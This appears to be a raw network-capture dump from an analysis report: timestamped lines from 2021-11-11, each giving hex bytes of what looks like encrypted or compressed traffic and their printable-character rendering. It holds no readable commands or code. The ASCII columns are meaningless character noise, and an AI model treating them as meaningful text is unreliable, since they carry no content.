                                                                                                                                                                                2021-11-11 11:26:50 UTC7578INData Raw: c7 fb 34 14 fa 20 9e 29 f3 35 3d 18 6b 25 67 c6 bf 09 21 d9 89 ee fe 24 79 c7 3f b8 82 a5 ef 17 c2 a3 ff 4c d1 5f e7 9f 7f 93 00 15 48 d4 85 cf 1f d8 21 f6 12 51 fa 16 09 54 ea 31 39 c2 42 4c 21 5f 73 18 27 dc 1a c9 df 8b 30 f5 05 56 d0 12 f3 fe e2 8f 9c b0 33 d3 20 e9 4f 3b ca 04 22 09 e9 ea 5d 33 a5 3d 12 01 da 9d 12 ac 14 64 cb dd 31 2e 08 2e 9d b6 ba 5e 25 d7 d5 96 9f ed fe d7 ba 03 f1 fa 01 07 22 44 c4 0c 2b ec 5d a0 8d 9e e9 4f 7a ac 08 b4 ee 66 63 58 9f 5c a6 2f f7 3e ce 89 cd 19 6b b6 e9 de 13 07 bb a7 ba 3c 01 25 e6 5f 14 63 0e b1 0c 31 cf 4b c7 7f 25 a7 28 b8 43 b7 69 5c 29 50 28 08 95 5f 96 f8 82 d5 75 56 ce 72 5d b0 75 ff 21 e5 6a f8 b2 cd 1b 18 2f 98 c6 e9 bd f6 75 25 c5 1f a7 f0 81 5e f2 33 92 8b cc fb 62 c2 da 55 7c ff 6f 1e 93 d6 ec 9a 4a
                                                                                                                                                                                Data Ascii: 4 )5=k%g!$y?L_H!QT19BL!_s'0V3 O;"]3=d1..^%"D+]OzfcX\/>k<%_c1K%(Ci\)P(_uVr]u!j/u%^3bU|oJ
                                                                                                                                                                                2021-11-11 11:26:50 UTC7594INData Raw: 74 a3 98 d4 1e cc 28 74 d2 0d a0 8f 48 00 95 f3 22 43 02 2e d3 66 00 6f a2 91 ff 82 be 60 fb ea a7 bf e4 ea 24 8b 7f 5d 06 ec 48 d0 55 74 95 70 4c 90 a6 27 84 b1 7d e0 2a 4b b7 a0 80 f7 a4 30 57 41 38 44 23 fb 12 54 fd ff e9 aa 03 28 3d 05 80 ab 80 c0 89 15 e0 a5 33 02 c3 79 cf ec a4 fc 5c 18 4c 3c 05 bc 85 78 70 17 00 aa 70 44 6f 3e ee a8 5b a0 90 71 04 00 d7 29 0b fb 75 72 25 36 1c 3c cd 12 0e d4 9f 20 5c 10 d6 43 e2 c3 78 e8 73 0f 80 dd 03 b5 c7 6d 6a 5b 70 80 58 53 8b b0 33 14 1c f4 fd cc 87 74 05 b5 2e 00 f8 57 32 c3 3e fc 09 21 eb 8c a2 fc 1e c1 8f e9 16 c0 c4 4d 01 fb c6 24 fc 13 39 09 c0 5e d5 a0 a0 cf 03 25 25 e8 56 e4 e0 1e d9 ca be 5f 96 d4 c2 bf fc 66 a4 b9 a9 ca cf 0e 44 07 8c d4 16 ff e6 d4 cc 52 42 af cc ee 26 09 f7 b7 cf 09 ff 7f 4a bd dd
                                                                                                                                                                                Data Ascii: t(tH"C.fo`$]HUtpL'}*K0WA8D#T(=3y\L<xppDo>[q)ur%6< \Cxsmj[pXS3t.W2>!M$9^%%V_fDRB&J
                                                                                                                                                                                2021-11-11 11:26:50 UTC7599INData Raw: 99 63 3b 35 6e fb 84 5c f8 b1 04 f3 0e bc 01 bf 9d 1a 6c c3 82 89 d8 be 5d b1 60 08 88 1b f9 bb 64 f6 9d 84 3b 12 1b e7 54 49 1a 5c 01 a6 92 95 4c f7 92 95 21 c2 07 13 ee 89 10 6b b1 3b 38 20 d6 bb 70 38 ff 33 21 27 ce 31 e2 d9 d7 70 7c d7 3c 62 a2 cf af 4f 96 e3 17 04 b1 6a 21 f7 fe 75 5d be 09 d7 da c6 50 27 08 0b 46 e7 b4 95 2f 5a 01 4e f7 2c b6 bf a9 77 f7 70 e5 21 49 c2 a8 4b f6 de 33 29 72 cf 4b 77 13 c0 f7 ed 4a 85 7d a3 e4 2a 8b c7 9a d8 f9 7e 8b 68 4f cc 31 cf 84 30 21 c7 68 ff 5b 87 bb 30 a4 d8 52 42 67 59 df af d8 ae 94 85 5a ff 16 b5 bd 42 ee f7 1a a6 5d f6 78 65 ef fa 3d 19 38 bc 7a b7 65 ce 9f 01 d3 f1 65 10 85 b1 ff a1 49 2f cb 96 4e fa 7c bd 37 89 50 3f 24 60 ad 89 d2 ae b3 28 c0 08 01 e1 89 31 95 ff b2 4c ed e7 bc 4e 89 93 17 3c 1f 4a 01
                                                                                                                                                                                Data Ascii: c;5n\l]`d;TI\L!k;8 p83!'1p|<bOj!u]P'F/ZN,wp!IK3)rKwJ}*~hO10!h[0RBgYZB]xe=8zeeI/N|7P?$`(1LN<J
                                                                                                                                                                                2021-11-11 11:26:50 UTC7615INData Raw: b9 ac 4a ec 0a 97 f2 f6 ff c9 be 5e 1e 21 02 92 32 fe 52 f8 be 3f f1 4e 90 9e 1b b4 4a 51 8f e0 80 da 1e b6 63 5b af 14 a0 b0 52 57 01 ac 45 0c d9 22 cd ab 7b b2 fe 10 8c f1 14 b6 66 ae 83 b4 97 1a 90 19 bc 03 e1 58 01 54 38 43 0e 42 a8 c1 01 28 1e 5b 1b a5 fe 56 c2 20 f0 d8 85 3d e1 11 fb 94 e0 65 a9 00 a5 e0 43 d6 be e9 17 f5 b7 83 f6 7c b8 08 0b 35 85 08 0c c1 a7 14 24 48 62 c3 18 74 ea cc 60 18 81 6e 8f 09 56 3a fc 0c 0d df 20 83 c7 29 c2 de 8a 6e de 0c e9 ab da 23 0a 44 98 63 e0 95 1c 63 9a 62 c1 b1 89 78 d4 cb fc 6e 80 61 34 28 e3 21 1e c0 11 67 00 57 52 7d 8b 54 1d 33 ba fe 19 27 7f 16 56 72 c2 13 22 7c 38 09 bd 4f f8 77 27 3a db e0 41 31 a4 40 14 50 20 36 29 10 ef 95 2c 08 55 c8 09 0a 72 e0 9b 00 f3 d4 33 fd fc ff e4 bd 00 6a 64 62 7f 3f e7 e2 c6
                                                                                                                                                                                Data Ascii: J^!2R?NJQc[RWE"{fXT8CB([V =eC|5$Hbt`nV: )n#Dccbxna4(!gWR}T3'Vr"|8Ow':A1@P 6),Ur3jdb?
                                                                                                                                                                                2021-11-11 11:26:50 UTC7631INData Raw: 8d 4e 59 3c 40 ab ed 13 8f 1a 35 bb 8a 3b 00 21 f7 01 ea 66 39 32 95 5c d9 64 ee b5 da 2a bd 66 df d7 f7 ba cc 87 0e f0 cf 96 20 c9 f9 b3 a7 f4 88 2f 57 96 f7 9a 15 bd 94 56 5a bf cb a1 12 f7 80 8a 83 4d 4b 90 97 68 5f 29 53 4f c2 aa 61 29 c6 0c 68 d3 a0 8a 16 29 4b 08 e7 df 4e 34 d7 22 4d c7 77 d6 fa 50 09 df a4 47 e0 a8 13 95 34 7f fc 59 8e 5a 12 b2 e8 89 e7 7e f4 78 31 cf 4a 21 9d 2d da 7d b2 a1 89 a4 65 d8 09 09 d7 32 e6 57 0a 21 03 25 d8 00 e5 3f a2 8b 92 ae 49 80 15 65 6c 3f 68 8e 9c a9 f3 cb 32 ea 29 57 5e d9 35 a2 29 07 6b b0 43 d1 bd 61 c8 ce 6b f3 b4 9d d7 eb ec 9e a2 f7 5f 71 a1 49 e4 9a bd 70 9e d6 aa 2d 52 2b 52 fa d9 5f 4d 6a 05 9c be 62 2e e9 59 43 a5 f4 f8 ac 16 58 01 c7 ac 8a 26 21 f1 35 12 b8 bb e3 41 90 63 25 05 7f 6e b6 2d 29 32 dc 49
                                                                                                                                                                                Data Ascii: NY<@5;!f92\d*f /WVZMKh_)SOa)h)KN4"MwPG4YZ~x1J!-}e2W!%?Iel?h2)W^5)kCak_qIp-R+R_Mjb.YCX&!5Ac%n-)2I
                                                                                                                                                                                2021-11-11 11:26:50 UTC7647INData Raw: 41 6a 77 01 b1 5a 12 85 33 47 df 91 fb 89 d7 3a 30 aa b2 51 21 4a c7 cd 78 21 16 47 74 45 f3 c1 4b 29 fb 6c d9 4a 28 b9 e7 84 0b 01 c6 08 11 7d 46 77 51 ea b9 3b ce 4e 16 21 c8 b3 0d 09 09 de 25 d7 45 9c 2d dd 19 96 0d 23 51 3c fe a5 3f 9a 98 d7 5b 6a 25 54 db ca 28 c2 29 d6 73 ac 92 01 ea d8 84 e3 84 3b 03 39 29 d8 4d 1f eb e2 9d 18 3d e9 09 5e f0 98 c5 39 93 4e 85 ce 35 28 8b f9 58 72 7f 59 fb fd 7d 5a f6 fe 74 40 af 31 0a 01 fa 71 c2 45 7f c1 fc c8 2d 3c 1c cb 0d 75 96 14 4c c0 64 a6 fc bc ec 42 31 d0 de 04 c1 11 21 de 21 e6 d0 d8 35 b3 08 35 7e 99 9a 3e 57 2c e8 41 e2 bf ff b0 97 cb 80 ae 17 fd 28 fb 17 01 cb fb 49 0a 0d 73 f0 a6 78 a0 d4 9f 4c 3b 9d d6 e2 52 4c 8a 98 87 95 c6 b0 27 31 d9 77 b2 47 56 53 49 5c 5e 42 31 c9 7e f8 51 d8 4c e7 21 d3 5a 12
                                                                                                                                                                                Data Ascii: AjwZ3G:0Q!Jx!GtEK)lJ(}FwQ;N!%E-#Q<?[j%T()s;9)M=^9N5(XrY}Zt@1qE-<uLdB1!!55~>W,A(IsxL;RL'1wGVSI\^B1~QL!Z
                                                                                                                                                                                2021-11-11 11:26:50 UTC7663INData Raw: ad cc 90 b6 12 09 c7 8d 79 61 70 14 b3 ba a9 0a df a5 32 4a 82 10 01 c2 51 2b 0b 09 f6 79 ed 8d 89 d6 22 46 85 31 f2 da 9d fb 26 93 f3 af f2 5c 92 ec 47 27 cf 16 94 97 de 2c cf c9 e3 5d d9 52 68 1a ac 0f 2d 5d b1 af 20 89 1d 31 02 d1 82 a4 af 62 29 cf 70 8f 29 09 df 86 9b 01 da ed cd ba 7b a1 39 33 cb 5a 22 3e 11 d4 49 2c 9d 70 ee 35 b5 79 17 6e c9 c7 7f 71 91 42 8b 36 f6 8a 12 f3 a8 58 15 c6 0f 7d df 92 d3 fb 84 9b ee f7 13 4d 1a 5e ce d1 4b bb 09 80 bf f5 59 3b 4a d0 50 cf 1c b6 41 51 bb 27 1a 2d f3 90 b3 d3 05 4c 04 a7 d1 9f 51 9b 40 13 18 31 d1 a6 b4 d6 70 a7 4c 5a ff 72 f6 b9 5d d3 04 8e 03 18 cb f7 57 cc 20 9f 41 48 c8 2f 13 67 2c 1e 35 b7 7c ac e2 29 c0 7d 62 90 42 f5 51 8d c0 31 c1 09 1e 9f dc f2 69 7c 1a 72 5b dd 01 2e 4f ac 65 4b 15 ae 8c 33 c1
                                                                                                                                                                                Data Ascii: yap2JQ+y"F1&\G',]Rh-] 1b)p){93Z">I,p5ynqB6X}M^KY;JPAQ'-LQ@1pLZr]W AH/g,5|)}bBQ1i|r[.OeK3
                                                                                                                                                                                2021-11-11 11:26:50 UTC7679INData Raw: 5e 80 51 3e 09 c9 e5 7b a9 04 7c 4b d2 a3 27 7d 4a 25 fe 28 38 31 4c db 75 6b c8 54 5c 02 2e 5c 6d 55 e2 68 57 fe cd e9 29 02 5e 7e 50 09 c2 b4 9a c9 5e 84 ea 44 12 b8 a7 60 21 19 14 f2 d4 8b bb 79 85 92 09 98 f3 ef b5 73 3e 3b 4e f2 7f c4 89 cb bb a9 33 41 ae 7a 2d 38 78 76 16 9d 9a ea 16 f3 b2 9f 9f 14 e9 a6 51 1e 72 5e 51 5d 3b be 64 55 e5 aa 7b dc 69 c2 a0 50 8a 09 bb 72 09 ce 24 74 b0 52 c2 c6 75 56 6f 64 f7 bc e9 58 12 2f d1 4c 04 fd 2f fb 2d 8e 6b 8c 3f d1 95 5d 8e 68 14 9a a1 01 d6 7a d9 84 6c 9c 46 5e 41 ae 2e aa 29 3b 7b 8e e1 54 58 ca 5e 28 28 60 ef 91 02 44 b3 26 32 b1 10 c1 ff 31 f7 3c cf d7 f0 28 c3 d3 34 aa ca 2a 6b 0c 5e ed 73 2f 34 e7 d5 94 83 9c 10 21 e9 a9 49 b4 26 ab 65 79 84 90 ee f3 47 97 af 65 bb b3 60 48 a8 e1 33 30 6f a6 3d 4f ac
                                                                                                                                                                                Data Ascii: ^Q>{|K'}J%(81LukT\.\mUhW)^~P^D`!ys>;N3Az-8xvQr^Q];dU{iPr$tRuVodX/L/-k?]hzlF^A.);{TX^((`D&21<(4*k^s/4!I&eyGe`H30o=O
                                                                                                                                                                                2021-11-11 11:26:50 UTC7695INData Raw: 9d 69 02 a5 ff e6 fc ca c0 81 08 31 1a 2f ca 26 53 4d a1 0d 2f 55 38 65 37 f6 3f c1 3a 26 ef df e4 f2 ff 8b 37 4b e3 10 27 f6 fc f8 c7 c2 eb b1 5d f0 e9 c7 15 e3 ec 51 c4 15 07 bc e7 5f e8 3d 9d 65 47 44 89 25 40 51 be 49 ca 86 df fb 1e ac 6d a5 4c e4 b5 62 ee d1 aa 44 35 f2 85 5b a9 83 25 c9 65 8d 92 2d 32 25 1f 7d d1 30 a5 dc e2 bd 24 1c e5 52 62 16 62 55 7f b8 2a 8f fd 7d ad 9f 66 f9 2e 35 24 2d e4 13 52 a0 63 a0 10 0f 86 1b 90 c3 c7 09 f1 2b f7 9b 4a f8 f3 4c 5a 3b 93 16 13 e9 20 2d 4d 61 58 02 5d 1f 53 c7 a7 b1 53 c9 2b 2d 87 38 8b 21 b8 2d e6 f9 95 df 09 61 f8 f2 95 14 cf 9d d5 10 b0 e1 86 8b cc b3 23 17 fe 0e ab d9 39 6e f9 6d d7 82 ce d1 dd f9 6f ab b6 12 c9 8d 7d 2b ae 2c 92 f6 5f 80 29 df 3e b5 62 7a e2 a5 96 f8 0b 42 77 72 4b d1 b6 06 5e ae 63
                                                                                                                                                                                Data Ascii: i1/&SM/U8e7?:&7K']Q_=eGD%@QImLbD5[%e-2%}0$RbbU*}f.5$-Rc+JLZ; -MaX]SS+-8!-a#9nmo}+,_)>bzBwrK^c
                                                                                                                                                                                2021-11-11 11:26:50 UTC7711INData Raw: 4a af 9d cf 06 47 2e b7 48 89 1a 66 12 2d 7a dc cd e5 61 6b f9 09 6b b9 05 c0 f1 c0 1b 4c 5a 12 29 1a 8b eb 56 5f 1a 67 da b3 4d e2 f6 53 3c 3b 5f b6 93 5f 56 f2 aa cf 87 5a e8 c7 b2 b8 11 25 38 1a 84 c6 ba bb b6 73 5a 94 d9 12 b6 ee b7 d6 4a b3 f2 2f f0 ea 79 5f 39 21 09 f6 89 33 07 21 0d 7b 9c 45 58 f7 9d e4 c6 64 d1 97 67 44 12 e6 8c f4 1f 9f 1a 12 7d b2 f6 5e aa 27 9a e5 d0 59 45 40 21 10 0d 8d af 0e ec 86 b0 a5 53 c7 99 17 2b 13 a0 b5 ea e8 44 25 ca 10 51 ca cb f4 f6 e5 c7 fb a7 43 5a b1 82 61 8e 3e 29 17 26 ab 13 29 fb 30 08 09 16 0d b5 d6 17 52 fd 19 3f 05 52 40 f3 d7 31 e9 ce 2b f1 d4 18 a5 05 4f 40 ca 6a 56 26 17 01 d1 e3 26 13 8b 39 f3 aa 13 21 c3 61 ec 29 cb 3f dd b6 25 83 0a f8 14 31 ce f3 4f e3 7b 13 01 d0 ec 34 c9 35 64 1f 04 f6 29 d8 8b 0a
                                                                                                                                                                                Data Ascii: JG.Hf-zakkLZ)V_gMS<;__VZ%8sZJ/y_9!3!{EXdgD}^'YE@!S+D%QCZa>)&)0R?R@1+O@jV&&9!a)?%1O{45d)
                                                                                                                                                                                2021-11-11 11:26:50 UTC7727INData Raw: 02 20 01 df bf 7c a2 61 08 31 c3 2e b9 0d 89 0d dc fc 58 21 fe 17 2b 0a 05 b7 e5 74 9e 41 ef 6b f3 ff 45 2c 0a e3 40 fc 58 2b 0f ba c6 74 f7 4a c0 72 8f 05 8b 15 72 86 5f bb ac 9f b1 c2 2f 6b 28 20 25 5b 01 8b 8d 5e a3 41 02 22 94 58 b0 26 f7 68 c7 21 d8 d6 5d 8a 68 14 e3 20 c9 a1 09 fb 70 be 0e 7f bf 17 73 22 51 ef 72 cd 38 f5 ef 44 ad e1 dd ef 3b 34 fa 37 c0 e9 5f 0b 1a 73 b0 bd 7d 41 c5 2e be 76 70 20 04 f6 68 8e 01 ee c6 67 04 27 21 1e 76 e8 51 17 2e f2 e9 e4 ab f7 d0 1c 3f 64 d6 17 ea ca c7 b0 2b ed ab 2b 16 41 28 92 13 29 3b 3b ae 70 b0 ee 97 c1 4f 58 f0 10 cf 48 28 45 b2 f7 77 7e 0f 52 ca a3 94 c1 bf 98 d0 29 f7 4f bf af 29 06 67 ba 2f cf ec b3 b7 53 38 2d 94 de a2 7a 51 98 81 29 ff 09 f1 be 3c 50 b2 e6 7c 86 53 4e 80 74 5b f2 0a 85 c2 b3 ec 7b b2
                                                                                                                                                                                Data Ascii: |a1.X!+tAkE,@X+tJrr_/k( %[^A"X&h!]h ps"Qr8D;47_s}A.vp hg'!vQ.?d++A();;pOXH(Ew~R)O)g/S8-zQ)<P|SNt[{
                                                                                                                                                                                2021-11-11 11:26:50 UTC7743INData Raw: c2 41 d7 4c 06 4f c2 fe 2d 2e 3a ba 65 ef bb a3 d7 d7 24 7a 84 56 f3 de 7d 44 20 01 9f 74 8d 65 ba 64 88 cc 84 f0 78 31 a6 0a 13 f9 01 fa fe ca f1 7e 5e eb 98 ca e6 b7 65 31 89 c3 b8 5e d0 5a 5f 42 76 55 74 00 cd c0 6f 28 4b 01 8a df c2 74 5f 71 ed a8 82 95 e2 fd 5d f6 77 53 d1 32 01 2f a6 c8 4a bd f9 2d 9c b4 e8 04 bb 8f e0 98 17 b2 20 8b 1f 69 f7 0e 15 a1 63 2b fe 2b e4 5b 29 11 6a b8 9f 41 73 e3 27 d3 c7 56 71 7a c6 66 5c f7 af 5e 84 d3 f7 ae 25 b8 d6 aa 59 d9 6c 27 3b df 2b ea d0 92 e1 bb 9d 55 2a 8c b6 31 58 df 72 4e ef 8b 99 40 e8 05 bb ed 11 0c 4a b9 c3 25 1b 55 25 3a c9 e2 34 d3 31 5a 03 1e 2b f8 eb c0 f3 bc 08 aa 72 f9 f2 12 5d 0b 32 e5 d1 b4 59 cb fc 4c af d7 ea c2 88 1c d1 0b 4b 56 bb 84 d0 21 cf bb b3 a3 12 da 0d b3 b1 40 5a 8b 5e 32 ed 8f 85
                                                                                                                                                                                Data Ascii: ALO-.:e$zV}D tedx1~^e1^Z_BvUto(Kt_q]wS2/J- ic++[)jAs'Vqzf\^%Yl';+U*1XrN@J%U%:41Z+r]2YLKV!@Z^2
                                                                                                                                                                                2021-11-11 11:26:50 UTC7759INData Raw: e6 04 f2 00 c9 eb 56 9f 5a f7 e1 e9 e8 2e fb 2d 94 d1 38 3b ae 75 7f fa 98 14 19 27 77 bb 50 bd 5a 1f 8c fd ca b5 d8 80 26 c6 19 cd 53 af 09 66 42 90 e0 97 fd 14 15 c9 4a 35 d9 85 6b 32 7c e0 94 c0 0d a4 15 55 0f 28 f2 73 7f ad a4 d0 e6 ba 8e 0a 4f ad e6 ce c6 4b d0 7f cc b4 4e c2 30 30 09 ff 21 15 c7 03 1e 35 3c 01 e5 38 29 e8 1f 4b 8b f8 4a ec 1d b0 26 be 90 2f 1c 5e ff 9a bc d7 d1 c7 a5 44 99 4a d0 e9 fb 05 21 0f 86 0b cb 38 2a f7 4b 5a d1 86 eb 40 95 e5 c8 ad fa 84 bf fc e4 72 82 1c 8b 3f 4c af b7 13 81 eb 10 fa 37 d5 db 8e ab d4 25 7e 74 c9 7f 9c 03 24 21 31 2f 2d 5f 9c d4 9d da 93 7b 3f 5b e6 ac d3 b3 66 14 fa 72 a8 ec 56 55 25 01 5e b3 27 1a 01 59 74 89 31 ce 57 47 a2 2e 0f 89 ee 40 d1 45 4f 82 ea a3 91 5e b5 2d 3a 6c d1 d1 bb 2c 40 25 cb dc 3a 65
                                                                                                                                                                                Data Ascii: VZ.-8;u'wPZ&SfBJ5k2|U(sOKN00!5<8)KJ&/^DJ!8*KZ@r?L7%~t$!1/-_{?[frVU%^'Yt1WG.@EO^-:l,@%:e
                                                                                                                                                                                2021-11-11 11:26:50 UTC7775INData Raw: 51 8b 6b ca 7f 40 44 01 97 f0 9b 4b 3f e6 7a 4e d8 fb de 9e c0 6b 63 bb 94 bf 2c 97 2b 5f 39 34 78 ef c0 da d3 89 da 90 56 0e 62 05 c8 12 cb ea 55 65 5f 2d dd 32 4f 56 b1 42 09 f3 d0 11 8e 3b 9b 47 29 75 9e 89 e5 fd 10 6c 21 39 70 b9 95 45 d3 a5 89 af 76 8e eb fd 31 93 c6 31 7b 3e c5 be ef 37 4e bf b3 ff 67 06 ea ca 6f 96 ff 9c e2 01 4e f8 af cc ea f1 91 86 62 8b 30 f4 ab 64 f7 fe 8a 2f 55 46 32 cf 94 c0 4b bd cb 97 f8 cd 5a 28 d3 8b 4f 03 b8 ae f4 95 2e 29 84 3b f9 0c 89 e3 df 79 ec 64 f3 ef 39 ce e5 0a 3e 29 0e 3b f8 5b c4 12 be af ec 71 a4 bb 13 13 b7 84 25 35 f7 14 88 0b d8 0f b6 1a 30 eb 29 d7 4a 25 22 66 de 75 29 8c b1 01 25 41 45 03 1a 20 4a 01 4b d8 ad bd 5f 30 62 33 19 89 7e fa 52 ff 61 4f bc d1 a2 7d 55 94 f7 bf e6 58 56 1a e0 7c 69 d7 78 f7 43
                                                                                                                                                                                Data Ascii: Qk@DK?zNkc,+_94xVbUe_-2OVB;G)ul!9pEv11{>7NgoNb0d/UF2KZ(O.);yd9>);[q%50)J%"fu)%AE JK_0b3~RaO}UXV|ixC
                                                                                                                                                                                2021-11-11 11:26:50 UTC7791INData Raw: 89 e8 13 eb f1 cf 92 13 cd 09 63 04 0b 28 10 b8 45 11 a7 f8 7b 27 e6 1c 36 ab 22 ce 20 9f c1 4e 0a 2c 9f a5 ba 32 de ea f1 7b 2e 87 09 01 f3 30 80 29 d0 bd 5e 36 69 d8 ef 95 ec c0 2c 21 c0 a2 9f f6 a7 67 b6 22 6c 3f 2b 3e af f1 fe 9f c7 ee a5 cb fb 31 ab 01 d1 49 21 44 9a aa 34 7b eb c2 12 c1 db 32 25 56 12 64 c3 a2 6a d7 bc 8c c9 f0 56 77 21 7a 29 8f a8 d7 97 9b 80 c0 fa 8b 3a b5 c6 c1 13 31 d0 25 bc 92 f5 b8 06 85 29 f8 ea dc f0 2d 5a 1c 9c 03 8b 13 13 89 eb f8 e8 de 17 f0 ea 28 d3 e7 60 b5 11 4c bb 07 80 70 9f 04 57 9e a3 f5 33 80 b8 a7 a0 86 c2 18 30 eb f6 d4 d8 01 c9 8b 0e a8 a3 c0 38 3a 00 f5 18 ad de e3 1d fe ff 03 eb cb 66 99 f9 ec f8 1a 39 c7 7c f4 e4 82 00 05 e3 27 38 03 3b 02 dc 07 c2 f8 43 48 45 30 4b 5f 4f 55 4f 54 ff 60 e3 57 4c 53 00 6f 66
                                                                                                                                                                                Data Ascii: c(E{'6" N,2{.0)^6i,!g"l?+>1I!D4{2%VdjVw!z):1%)-Z(`LpW308:f9|'8;CHE0K_OUOT`WLSof
                                                                                                                                                                                2021-11-11 11:26:50 UTC7807INData Raw: ef ee b2 fe da 87 d1 39 4b 77 a4 5f 5a ff 70 e6 67 87 3c 44 6f f3 bf 45 7d a4 8e c9 f6 c3 62 fa 25 6c cc 5e 37 fb 2d 09 44 ab 2c fe e8 b9 16 48 b4 69 61 24 df 44 99 85 45 ea 62 d8 05 d1 5e 2d df 06 10 eb 34 ff c0 94 e4 2f 2a 3d 74 70 eb f6 73 13 e1 bf f2 99 db fe c4 fe b2 a6 93 a3 46 2d e2 d7 94 de 09 29 d1 03 37 29 68 8b 4d 7d 96 e9 5f 09 b2 92 89 c2 f1 f8 c4 d1 10 65 69 36 5d 78 99 4b 19 9d ed 4d 4a 3b e1 4e e0 8d c0 2c 49 18 8c 53 fa 13 d5 5b ec 22 62 ce bc ee 49 eb 7d d3 34 ac 3a c6 66 20 51 cd 8c 2f f8 d4 c2 01 ee 31 f7 4c 76 98 74 32 29 cf 48 1b df 51 d7 63 09 c7 0b 56 f3 d5 5a 71 7a a5 6a 02 a7 06 f0 44 d9 ea d9 ec 59 98 15 ba af a7 c8 25 29 f4 b3 a4 d4 2d 16 16 fd 78 2b cf 31 b3 8c 7b c2 50 03 55 cf ac 9b 6b 21 ba 75 63 a9 fa df 57 76 80 50 ff 36
                                                                                                                                                                                Data Ascii: 9Kw_Zpg<DoE}b%l^7-D,Hia$DEb^-4/*=tpsF-)7)hM}_ei6]xKMJ;N,IS["bI}4:f Q/1Lvt2)HQcVZqzjDY%)-x+1{PUk!ucWvP6
                                                                                                                                                                                2021-11-11 11:26:50 UTC7823INData Raw: 02 f7 84 b1 4f 51 fd 98 0e 01 ee 97 4c 98 b5 c4 b0 25 89 f0 fd c5 ac be a5 f9 77 e5 b1 a0 88 b0 04 97 d0 e4 97 57 ba 47 d7 51 ef 49 d5 79 d7 6b 57 e5 01 3a 2e d6 1d e1 18 9c 09 e0 21 f7 97 ff 9c ee 91 6a 63 31 d9 c5 5f 40 e7 ff 94 a9 95 31 b1 3b 2b 29 dd 7a 17 89 fa 8b 70 5a a8 5b 89 2d 5e de e8 77 45 13 d9 8f 61 84 2a 32 ae 0f 13 e2 80 2b 09 cd 74 29 6c 2c e8 a5 74 27 c6 5c fa 12 9b e3 2d f7 1a ca 75 29 b4 ff 45 da 2d d9 4e 51 0f c3 84 62 5f cd 26 11 06 78 4b 03 a8 94 b4 bf e9 5f ce c7 d2 b7 bf 14 b2 2f f3 5e ff 29 1d 2c c6 09 ef 21 fe 54 b7 12 f8 c5 2a b7 19 7d 09 f6 30 17 05 79 69 9c bf 2f 94 91 9e 53 69 de 81 97 cb ee 2d d0 21 cc 6c 3b a2 09 5f e1 fe b9 09 e5 d6 2e ff 34 0f ea 94 3f bb 61 f5 e6 04 7e 32 17 fb 55 53 32 0f 16 b8 af 1c c9 cb d7 7b 02 25
                                                                                                                                                                                Data Ascii: OQL%wWGQIykW:.!jc1_@1;+)zpZ[-^wEa*2+t)l,t'\-u)E-NQb_&xK_/^),!T*}0yi/Si-!l;_.4?a~2US2{%
                                                                                                                                                                                2021-11-11 11:26:50 UTC7839INData Raw: ba 29 63 7e 0b db c6 f6 ff 58 31 f3 b7 1a a6 d5 e2 a3 42 32 d3 3d 2d 5f 3a ca 04 89 c9 ae a8 e0 a4 b8 43 85 29 df 13 29 ba b6 dc 78 99 48 69 46 11 4c d9 8a 72 5e c1 f9 dc 4b f6 ef 51 fd 3f 79 48 2a ee 2d 5b 2c 32 12 f3 80 a2 6a 92 91 2e 29 d7 71 6f 73 b9 5b e0 0e 65 81 1d 68 be 81 17 05 e5 42 6f f3 78 92 35 5d f8 44 de 92 be b6 de 13 f7 24 f2 30 93 fe 39 a4 10 0b 66 31 16 9c 51 e9 6e 18 98 b6 b7 e6 e7 16 0f b7 02 9c f6 8b 5a 3b a7 2f 3d 21 4b e2 41 92 a9 fd cf 09 42 1f 45 28 75 71 47 49 f7 15 dc 25 f9 f0 40 cf d4 e0 35 9d 08 9c ed 52 d7 6e e5 9d ea 2e d7 4e ec b7 79 7c 97 d6 cb 16 40 29 31 4b fa b4 39 c7 d2 52 ae 9d 4e b9 a8 5e 61 cc 2b 06 2a bc 3c dd d3 db fa 8d 96 3b eb 39 14 f2 82 3f 33 06 55 46 71 95 60 19 f3 1c 95 94 db 88 97 e1 04 bd 14 84 fc d9 be
                                                                                                                                                                                Data Ascii: )c~X1B2=-_:C))xHiFLr^KQ?yH*-[,2j.)qos[ehBox5]D$09f1QnZ;/=!KABE(uqGI%@5Rn.Ny|@)1K9RN^a+*<;9?3UFq`
                                                                                                                                                                                2021-11-11 11:26:50 UTC7855INData Raw: 31 4a f0 ba 33 d9 ef fd ae cb e3 4e ad 0e 89 f3 d5 59 83 62 c6 1f fe 6a 58 0f 92 05 d9 f5 34 09 c6 ee 98 b8 25 b5 d4 21 52 5d c9 f0 95 05 ad 4f 4a d8 fd de e4 f8 bc 28 05 fe 9b 15 8c a3 bb bd 96 9d 5a eb ca 0d 5a c3 e0 cb a2 df f7 4d 45 12 16 e0 0a f6 9d 7f 32 c1 7d f8 a0 bd d6 a9 12 91 a8 c9 b2 c9 d9 03 a5 78 26 5f ca b2 6c cf 31 d2 e8 49 ce 21 d3 af b6 a2 24 36 56 07 09 c2 01 2d 92 2e fd 5c 96 52 cf b7 2a 4b 8d 91 3f 45 5a ca 1c 52 3d 80 b6 86 47 89 6b f2 04 66 3a 1f 33 0f 09 09 39 08 46 c7 97 5d 9b b7 a3 ee b2 d9 6a 13 fc 89 50 31 f9 c2 68 c3 f5 70 62 b9 57 c6 06 0b 01 eb 09 f9 c7 0e 25 cc b5 97 42 a1 7d 4c a6 81 e3 c7 2a ba 28 e8 28 51 1e d1 2e e3 b9 90 e8 d3 ec aa 27 80 14 9b 7f b0 fc ce 4f 20 28 91 e6 84 2f 09 c9 7e 11 51 13 23 0c 8e cb dc 25 73 f4
                                                                                                                                                                                Data Ascii: 1J3NYbjX4%!R]OJ(ZZME2}x&_l1I!$6V-.\R*K?EZR=Gkf:39F]jP1hpbW%B}L*((Q.'O (/~Q#%s
